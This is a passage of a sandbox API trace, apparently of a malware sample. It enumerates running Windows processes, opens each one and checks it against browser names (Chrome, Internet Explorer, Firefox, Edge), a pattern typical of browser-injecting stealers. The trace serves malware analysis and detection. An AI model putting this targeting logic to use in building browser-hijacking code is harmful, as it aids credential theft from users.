	[0194.893] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.894] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xdb0
	[0194.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.894] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.895] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.896] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.896] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.897] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xdb4
	[0194.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.898] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.899] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.899] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.900] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.900] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.901] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xdb8
	[0194.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.901] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.902] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.903] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.903] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.903] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.905] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xdbc
	[0194.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.905] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.905] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.906] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.906] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.906] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.907] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xdc0
	[0194.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.907] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.908] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.908] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.909] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.909] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.910] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xdc4
	[0194.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.910] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.910] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.911] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.911] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.911] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0194.912] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xdc8
	[0194.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.912] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0194.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.912] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.912] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0194.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.913] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.913] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.914] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xdcc
	[0194.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.914] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.914] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.914] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.915] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.915] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0194.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xdd0
	[0194.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.916] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.916] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.916] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.917] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.917] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0194.918] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xdd4
	[0194.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.918] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0194.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.918] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.919] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0194.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.919] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.919] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.920] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xdd8
	[0194.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.920] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.921] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.921] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.921] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.921] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0194.922] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xddc
	[0194.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.922] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0194.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.923] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.923] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0194.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.924] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.924] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0194.924] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xde0
	[0194.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.925] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0194.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.925] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.925] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0194.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.926] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.926] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0194.926] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xde4
	[0194.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.926] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0194.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.927] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.927] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0194.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.927] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.927] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0194.928] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xde8
	[0194.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.928] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0194.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.928] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.929] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0194.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.929] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.929] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0194.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0194.930] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0194.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xdec
	[0194.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.931] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0194.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.931] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.932] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0194.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.933] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.934] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0194.935] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xdf0
	[0194.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.935] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0194.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.935] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.935] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0194.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.936] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.936] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0194.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xdf4
	[0194.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.937] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0194.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.937] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.937] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0194.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.937] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.938] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0194.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xdf8
	[0194.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.939] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0194.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.939] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.939] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0194.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.940] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.940] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0194.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xdfc
	[0194.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.941] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0194.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.941] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.942] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0194.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.942] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.943] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0194.943] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xe00
	[0194.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.943] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0194.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.944] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.944] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0194.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.944] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.944] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0194.945] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xe04
	[0194.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.945] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0194.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.946] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.946] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0194.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.946] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.947] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0194.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xe08
	[0194.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.947] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0194.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.948] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.948] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0194.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.949] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.949] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0194.950] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xe0c
	[0194.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.950] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0194.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.950] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.950] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0194.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.951] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.951] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0194.951] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xe10
	[0194.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
